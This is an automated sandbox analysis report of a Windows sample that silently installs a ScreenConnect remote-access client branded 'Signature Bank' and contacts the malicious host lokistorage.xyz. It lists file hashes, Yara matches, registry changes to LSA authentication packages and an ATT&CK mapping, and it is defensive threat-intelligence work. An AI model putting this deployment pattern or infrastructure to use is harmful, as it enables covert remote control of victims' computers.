Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

Code function: 9_2_00007FFD340D5B35 CreateNamedPipeW,

9_2_00007FFD340D5B35

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Code function: 8_2_014F4D2E RtlGetVersion,

8_2_014F4D2E

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Modifies security policies related information

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\msiexec.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages

Yara detected ScreenConnect Tool

Remote Access Functionality

Source: Yara match	File source: lat0Kwfbuj.exe, type: SAMPLE
Source: Yara match	File source: 0.2.lat0Kwfbuj.exe.5600000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ScreenConnect.WindowsClient.exe.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ScreenConnect.WindowsClient.exe.271fa18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.ScreenConnect.WindowsClient.exe.301fa50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lat0Kwfbuj.exe.5600000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.lat0Kwfbuj.exe.b9b9d4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.lat0Kwfbuj.exe.bc518c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.lat0Kwfbuj.exe.b163d4.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.lat0Kwfbuj.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2222155530.0000000005600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2257604970.00000000004F2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3438865774.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2207287516.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2611494645.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lat0Kwfbuj.exe PID: 5880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: C:\Config.Msi\48861a.rbs, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\MSI884C.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	31 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	11 Peripheral Device Discovery	Remote Services	11 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	1 Replication Through Removable Media	1 Native API	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Component Object Model Hijacking	1 Component Object Model Hijacking	1 Obfuscated Files or Information	Security Account Manager	45 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Valid Accounts	1 Valid Accounts	1 Software Packing	NTDS	21 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Windows Service	1 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	1 Bootkit	2 Windows Service	1 DLL Search Order Hijacking	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	13 Process Injection	1 File Deletion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	122 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Valid Accounts	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	51 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	13 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Users	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service
Business Relationships	Server	Trusted Relationship	Visual Basic	Container Orchestration Job	Container Orchestration Job	1 Bootkit	Web Portal Capture	Local Groups	Component Object Model and Distributed COM	Local Email Collection	Internal Proxy	Commonly Used Port	Direct Network Flood
Identify Business Tempo	Botnet	Hardware Additions	Python	Hypervisor	Process Injection	1 Rundll32	Credential API Hooking	Domain Groups	Exploitation of Remote Services	Remote Email Collection	External Proxy	Transfer Data to Cloud Account	Reflection Amplification

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
lat0Kwfbuj.exe	21%	ReversingLabs	Win32.PUA.ConnectWise

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI805D.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.Compression.Cab.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.Compression.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.WindowsInstaller.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.InstallerActions.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Windows\Installer\MSI888B.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI8C55.tmp	0%	ReversingLabs

Name	IP	Active	Malicious	Antivirus Detection	Reputation
lokistorage.xyz	95.164.16.15	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://wixtoolset.org/releases/	rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr	false	high
http://wixtoolset.org/news/	rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ScreenConnect.ClientService.exe, 00000008.00000002.3441561097.00000000022A9000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611494645.0000000003427000.00000004.00000800.00020000.00000000.sdmp	false	high
http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v	rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr	false	high
https://feedback.screenconnect.com/Feedback.axd	ScreenConnect.Core.dll.3.dr	false	high
https://docs.rs/getrandom#nodejs-es-module-support	ScreenConnect.WindowsCredentialProvider.dll.3.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
95.164.16.15	lokistorage.xyz	Gibraltar		29632	NASSIST-ASGI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1554617
Start date and time:	2024-11-12 18:39:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lat0Kwfbuj.exe renamed because original name is a hash value
Original Sample Name:	723553540a5bdd7ae07408bceef12e9b4feb1b572a5c0d30c251fe2bdf4bc5bf.exe
Detection:	MAL
Classification:	mal50.troj.evad.winEXE@17/64@1/1
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 82% Number of executed functions: 324 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target lat0Kwfbuj.exe, PID 5880 because it is empty
Execution Graph export aborted for target rundll32.exe, PID 2620 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: lat0Kwfbuj.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NASSIST-ASGI	Josho.m68k.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	J5uGzpvcAa.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	nPRmTlXhOT.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	OwBugJ5CiC.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	H5LPetzgXV.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	4l9YKCc7qQ.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	mCR2IJsjgy.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	Josho.arm7.elf	Get hash	malicious	Mirai	Browse	95.164.4.65
	J3m5xLlT8D.exe	Get hash	malicious	DCRat	Browse	95.164.6.175
	na.elf	Get hash	malicious	Unknown	Browse	94.131.118.154

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll	Latest version 4.7.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Latest version 4.7.exe	Get hash	malicious	ScreenConnect Tool	Browse
	INSPECAO-B01S.msi	Get hash	malicious	ScreenConnect Tool	Browse
	1.exe	Get hash	malicious	ScreenConnect Tool	Browse
	1.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5iT2ITz44g.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5iT2ITz44g.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E-receipt-67.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E-receipt-67.exe	Get hash	malicious	ScreenConnect Tool	Browse
	statment.exe	Get hash	malicious	ScreenConnect Tool	Browse

Created / dropped Files

C:\Config.Msi\48861a.rbs

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	219562
Entropy (8bit):	6.5819256907117225
Encrypted:	false
SSDEEP:	3072:X09LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG4:X0uH2aCGw1ST1wQLdqv4
MD5:	8F82F7597826296AE06CA611F9EB7B85
SHA1:	70E6B93152921577345C8E56E907FD997DE8DB4E
SHA-256:	C2E3AB81282AF899E0CDBB8F4B13FE29DB4B8EC7FC5C711BDA1B62708A67D343
SHA-512:	5D0B76C149C1C5996FC52D5A535B2C9B8313565AB1C75C936DA871A9684B72A068A3F82A5C3700130C74526B934ED9ED61B00E2BADF56431BFB3F62E2B10EA34
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\48861a.rbs, Author: Joe Security
Reputation:	low
Preview:	...@IXOS.@.....@.elY.@.....@.....@.....@.....@.....@......&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}'.ScreenConnect Client (20ae101cef0f1acf)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (20ae101cef0f1acf)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{02BB93AF-5D7F-2FA3-2CF1-9B67E8FF130E}&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.@......&.{CD7C3ECA-C9AF-5145-BA7A-4A372EAC7AA5}&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.@......&.{C0E56857-1338-1BBE-56C3-EE29B4292C6F}&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.@......&.{6E5988BE-3FE4-2081-9090-28726FA53B07}&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.@......&.{AAFCFDA6-3A31-9AA2-04B7-C6C55684F80B}&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.@......&.{7BEC3624-40B7-0ABF-4C6B-0093902CAEA0}&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.@....

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.Override.en-US.resources

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	241
Entropy (8bit):	4.920230500734458
Encrypted:	false
SSDEEP:	6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsiMI4CAcO:rHy2DLI4MWoj12K9cAuiMI4L
MD5:	E412586907C81C15CED17A120DE270B3
SHA1:	EE0E2EDE15DAD65285184C2044367CC6D20D8709
SHA-256:	0F0E577CD0071C73AFB57530C67C5C79E3A0695FBA617ED5531B882AAB0531EB
SHA-512:	CFB7699A72B393B06B89C197F378EBC31650E0D9B96966F1464BA79E6EF92B6EE9D951D588E47250E9A523869E0E9FDE592E237168B429F430C1A11EE2F8045B
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.......Signature Bank

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	49959
Entropy (8bit):	4.758252520953682
Encrypted:	false
SSDEEP:	1536:sdr6QF+gQpAfqiErOmOCqZUWi+JgJ0FQi9zwHLAhDKZ1HtRKekmrg9:sdr1F+gQOlErOmPqZUWi+JgJ0FQi9zw2
MD5:	511202ED0BA32D7F09EAB394C917D067
SHA1:	DBD611720FD1730198F72DEC09E8E23E6D6488F8
SHA-256:	F8398A235B29AF6569F2B116E0299B95512D042F5A4CD38C98C79729A5FBDB9D
SHA-512:	F04B08938F3EBF8CFA1A1157A94DA3AE4699494BDCE566619AFA5B13A8F6EBE556D522C064E5EA02E343B59A489343F77E3EA2BB2EA390AAE35A626F41CADC77
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C\|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..v.......B....A...a......D..c..w..K,..t...S.....v....7.6\|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........\|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	26722
Entropy (8bit):	7.7401940386372345
Encrypted:	false
SSDEEP:	384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
MD5:	5CD580B22DA0C33EC6730B10A6C74932
SHA1:	0B6BDED7936178D80841B289769C6FF0C8EEAD2D
SHA-256:	DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
SHA-512:	C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.595800276062395
Encrypted:	false
SSDEEP:	3072:TS77Zz8NtrNOuJTaFs2VUXEWcyzvXqu5zDvJXYt:E7OrJOuJE4Xawqu5G
MD5:	F311A8217807F6C85817058522E234A2
SHA1:	CEB586B3CF7B0EE86EA8242D9B3D8641C9444CD1
SHA-256:	032450CD037D9E0EEC49E0B4FF44073D539775633FB4AF6FD76D4CB19116AAC9
SHA-512:	5EF1F6B595AF9CC7F788680AC3F3E9B8B12BAAFE734A8E2F675BAA57F5EF2C69806492911BDA54F11C5A4B8CF3CCED82CFC6E0ECF214E45083E9F9AA6A83D039
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Latest version 4.7.exe, Detection: malicious, Browse Filename: Latest version 4.7.exe, Detection: malicious, Browse Filename: INSPECAO-B01S.msi, Detection: malicious, Browse Filename: 1.exe, Detection: malicious, Browse Filename: 1.exe, Detection: malicious, Browse Filename: 5iT2ITz44g.exe, Detection: malicious, Browse Filename: 5iT2ITz44g.exe, Detection: malicious, Browse Filename: E-receipt-67.exe, Detection: malicious, Browse Filename: E-receipt-67.exe, Detection: malicious, Browse Filename: statment.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k%..........." ..0................. ... ....... .......................`.......L....@.....................................O.... ..\|....................@......4...8............................................ ............... ..H............text...P.... ...................... ..`.rsrc...\|.... ......................@..@.reloc.......@......................@..B........................H.......................^................................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~'...%-.&~&.....y...s....%.'...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.%...($....5..............s%....=.....0...........~)...%-.&~(.....\|...s&...%.)...(...+..~...%-.&~(.....}...s(...%.*...(...+.r9..

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.081952570081618
Encrypted:	false
SSDEEP:	1536:XxgIAw8rVbpcgOswatz8Bn2yRIZMmQ9VIlxnBVb8ER:Xw31b4f0Q9VAnNR
MD5:	3FF07C657068430EF677181D1F67066D
SHA1:	37F7E9D2CCB65B4EA2733393015635EA1B43393E
SHA-256:	D17CF13612039F6A4CA17B56C32399CCBE279A499C8D2F8E910B1FD6F4FFF2B1
SHA-512:	5552208B5649CEAC2B32510EA12D409A85643D27E6A9C335E049195A507AE9211AEE77574376FDE059747998B60AE041E191635A67C3461585ABA7F9B877B095
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............." ..0..............!... ...@....... ....................................@.................................-!..O....@.......................`....... ..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................a!......H.......Po....................... ........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....j...s....%.,...(...+vs....%.}Q.........s....(........0...........s....}.....s....}...........}.......('.....}.....(....&.(..........s....o.....(*...~-...%-.&~+.....k...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s>...}....... ..6........s....s>...}.....((...($............o%........

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95520
Entropy (8bit):	6.505417048098125
Encrypted:	false
SSDEEP:	1536:jg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgIU0HMm7/xK:MhbNDxZGXfdHrX7rAc6myJkgIU0HVY
